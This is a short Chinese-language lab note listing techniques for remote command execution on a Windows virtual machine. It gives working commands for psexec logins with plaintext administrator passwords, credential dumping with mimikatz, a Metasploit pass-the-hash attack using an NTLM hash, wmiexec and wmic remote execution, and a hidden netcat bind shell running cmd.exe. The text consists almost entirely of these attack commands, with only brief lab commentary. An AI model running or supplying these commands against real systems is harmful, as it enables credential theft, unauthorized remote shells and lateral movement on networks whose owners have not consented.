環境:Win10、Win7虛擬機
Windows遠程命令執行
1、psexec.exe遠程執行命令
psexec \\192.168.30.128 -u Administrator -p 123456789 cmd.exe
這裏一開始登陸的是另一個管理員賬號,但是一直被拒絕訪問,後來把Administrator賬號取消隱藏,一下就連接上。之後看到一篇文章也有一樣的情況,只有Administrator賬號才能連接,就算是管理員用戶組的其他用戶也不能連接,UAC的問題。
2、使用Hash登陸Windows
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"
或者使用wce抓取hash值:
msf調用payload:
use exploit/windows/smb/psexec
show options
set RHOST 192.168.30.128
Set SMBPass 0182BD0BD4444BF867CD839BF040D93B:C22B315C040AE6E0EFEE3518D830362B
set SMBUser Administrator
show options
Run
3、利用wmiexec工具配合進行反彈半交互shell
cscript.exe //nologo wmiexec.vbs /shell 192.168.30.128 Administrator 123456789
還可以單條命令執行
4、WMI執行命令方式,無回顯
wmic /node:192.168.30.128 /user:Administrator /password:123456789 process call create "cmd.exe /c ipconfig>c:\result.txt"
執行成功後可以在被控制的機器裏面找到執行結果的文件
5、nc遠程執行
先在被控機器上開啓監聽,-L:讓監聽者在連接多次掉線時仍堅持監聽,-d:讓nc隱藏運行,-e:指定要運行的程序,-p:監聽的端口
nc.exe -L -d -e cmd.exe -p 5555
控制端運行nc64.exe 192.168.30.128 5555